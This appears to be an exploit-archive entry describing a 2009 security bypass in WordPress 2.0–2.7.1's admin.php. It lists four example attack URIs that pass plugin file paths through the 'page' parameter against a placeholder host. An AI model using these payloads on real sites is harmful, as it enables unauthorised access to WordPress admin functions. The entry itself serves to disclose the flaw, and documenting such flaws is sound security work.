[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : WordPress 2.0 - 2.7.1 admin.php Module Configuration Security Bypass Vulnerability
# Published : 2009-11-10
# Author : Fernando Arnaboldi
# Previous Title : CuteNews and UTF-8 CuteNews Multiple Security Vulnerabilities
# Next Title : phpBazar <= 2.1.1fix (cid) SQL Injection
An attacker can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/wp-admin/admin.php?page=/collapsing-archives/options.txt
http://www.example.com/wp-admin/admin.php?page=akismet/readme.txt
http://www.example.com/wp-admin/admin.php?page=related-ways-to-take-action/options.php
http://www.example.com/wp-admin/admin.php?page=wp-security-scan/securityscan.php